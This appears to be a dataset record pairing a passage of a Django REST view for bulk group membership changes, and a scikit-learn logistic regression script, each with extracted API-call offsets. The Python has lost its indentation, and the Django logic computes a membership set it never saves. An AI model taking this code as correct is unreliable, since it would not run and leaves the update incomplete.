# Make sure the provided owner group exists.
if uu.check_group_exists(n=action_set['owner_group']):
group_information.owner_group = Group.objects.get(
name=action_set['owner_group']
)
group_information.save()
else:
# TODO: This seems to be some type of error state
pass
if 'owner_user' in action_set:
# Make sure the provided owner user exists.
if uu.check_user_exists(un=action_set['owner_user']):
group_information.owner_user = User.objects.get(
username=action_set['owner_user']
)
group_information.save()
else:
# TODO: This seems to be some type of error state
pass
# Finally, perform the set logic to add and remove
# users and groups.
# Get all users in the group.
all_users = set([i.username for i in list(grouped.user_set.all())])
# Removals are processed first, then additions.
# Remove the users provided, if any.
if 'remove_users' in action_set:
all_users = all_users - set(
list(
User.objects.filter(
username__in=action_set['remove_users']
).values_list('username', flat=True)
)
)
# Get the users in the groups provided, if any.
if 'disinherit_from' in action_set:
# Get all the groups first, then get the user list.
rm_group_users = list(
User.objects.filter(
groups__in=Group.objects.filter(
name__in=action_set['disinherit_from']
)
).values_list('username', flat=True)
)
all_users = all_users - set(rm_group_users)
# Addition explained at https://stackoverflow.com/a/1306663
# Add the users provided, if any.
if 'add_users' in action_set:
all_users.update(
list(
User.objects.filter(
username__in=action_set['add_users']
).values_list('username', flat=True)
)
)
# Get the users in the groups provided, if any.
if 'inherit_from' in action_set:
# Get all the groups first, then get the user list.
a_group_users = list(
User.objects.filter(
groups__in=Group.objects.filter(
name__in=action_set['inherit_from']
)
).values_list('username', flat=True)
)
all_users.update(a_group_users)
else:
pass
returning.append(db.messages(parameters={'group': grouped.name})['200_OK_group_modify'])
else:
# Requestor is not the admin.
returning.append(db.messages(parameters={})['403_insufficient_permissions'])
else:
# Update the request status.
returning.append(db.messages(parameters={})['400_bad_request'])
# As this view is for a bulk operation, status 200
# means that the request was successfully processed,
# but NOT necessarily each item in the request.
return Response(status=status.HTTP_200_OK, data=returning)
| [
"django.contrib.auth.models.Group.objects.get",
"django.contrib.auth.models.Group.objects.filter",
"django.contrib.auth.models.Group.objects.all",
"django.contrib.auth.models.User.objects.filter",
"rest_framework.response.Response",
"pdb.set_trace",
"django.contrib.auth.models.User.objects.get"
] | [((7628, 7679), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_200_OK', 'data': 'returning'}), '(status=status.HTTP_200_OK, data=returning)\n', (7636, 7679), False, 'from rest_framework.response import Response\n'), ((1294, 1330), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'name': 'standardized'}), '(name=standardized)\n', (1311, 1330), False, 'from django.contrib.auth.models import Group, User\n'), ((1355, 1370), 'pdb.set_trace', 'pdb.set_trace', ([], {}), '()\n', (1368, 1370), False, 'import pdb\n'), ((811, 830), 'django.contrib.auth.models.Group.objects.all', 'Group.objects.all', ([], {}), '()\n', (828, 830), False, 'from django.contrib.auth.models import Group, User\n'), ((3607, 3656), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'name': "action_set['owner_group']"}), "(name=action_set['owner_group'])\n", (3624, 3656), False, 'from django.contrib.auth.models import Group, User\n'), ((4170, 4221), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'username': "action_set['owner_user']"}), "(username=action_set['owner_user'])\n", (4186, 4221), False, 'from django.contrib.auth.models import Group, User\n'), ((6174, 6231), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username__in': "action_set['add_users']"}), "(username__in=action_set['add_users'])\n", (6193, 6231), False, 'from django.contrib.auth.models import Group, User\n'), ((5027, 5087), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username__in': "action_set['remove_users']"}), "(username__in=action_set['remove_users'])\n", (5046, 5087), False, 'from django.contrib.auth.models import Group, User\n'), ((5589, 5649), 'django.contrib.auth.models.Group.objects.filter', 'Group.objects.filter', ([], {'name__in': "action_set['disinherit_from']"}), "(name__in=action_set['disinherit_from'])\n", (5609, 5649), False, 'from django.contrib.auth.models import Group, User\n'), ((6729, 6786), 'django.contrib.auth.models.Group.objects.filter', 'Group.objects.filter', ([], {'name__in': "action_set['inherit_from']"}), "(name__in=action_set['inherit_from'])\n", (6749, 6786), False, 'from django.contrib.auth.models import Group, User\n')] |
import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score, f1_score
from sklearn.model_selection import train_test_split
from itertools import combinations
from sklearn import preprocessing
from sklearn.linear_model import LogisticRegression
X_train = pd.read_csv('X-train-raw.csv')
X_test = pd.read_csv('X-test-raw.csv')
y_train = pd.read_csv('y-train-raw.csv').values.ravel()
y_test = pd.read_csv('y-test-raw.csv').values.ravel()
model = LogisticRegression(random_state = 2, max_iter = 10000)
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
acc = round(accuracy_score(y_pred, y_test)*100,2)
f1 = round(f1_score(y_pred, y_test)*100,2)
print(acc, f1) # 73.97 38.71
| [
"sklearn.metrics.f1_score",
"sklearn.metrics.accuracy_score",
"pandas.read_csv",
"sklearn.linear_model.LogisticRegression"
] | [((281, 311), 'pandas.read_csv', 'pd.read_csv', (['"""X-train-raw.csv"""'], {}), "('X-train-raw.csv')\n", (292, 311), True, 'import pandas as pd\n'), ((321, 350), 'pandas.read_csv', 'pd.read_csv', (['"""X-test-raw.csv"""'], {}), "('X-test-raw.csv')\n", (332, 350), True, 'import pandas as pd\n'), ((473, 523), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'random_state': '(2)', 'max_iter': '(10000)'}), '(random_state=2, max_iter=10000)\n', (491, 523), False, 'from sklearn.linear_model import LogisticRegression\n'), ((601, 631), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['y_pred', 'y_test'], {}), '(y_pred, y_test)\n', (615, 631), False, 'from sklearn.metrics import accuracy_score, f1_score\n'), ((650, 674), 'sklearn.metrics.f1_score', 'f1_score', (['y_pred', 'y_test'], {}), '(y_pred, y_test)\n', (658, 674), False, 'from sklearn.metrics import accuracy_score, f1_score\n'), ((362, 392), 'pandas.read_csv', 'pd.read_csv', (['"""y-train-raw.csv"""'], {}), "('y-train-raw.csv')\n", (373, 392), True, 'import pandas as pd\n'), ((417, 446), 'pandas.read_csv', 'pd.read_csv', (['"""y-test-raw.csv"""'], {}), "('y-test-raw.csv')\n", (428, 446), True, 'import pandas as pd\n')] |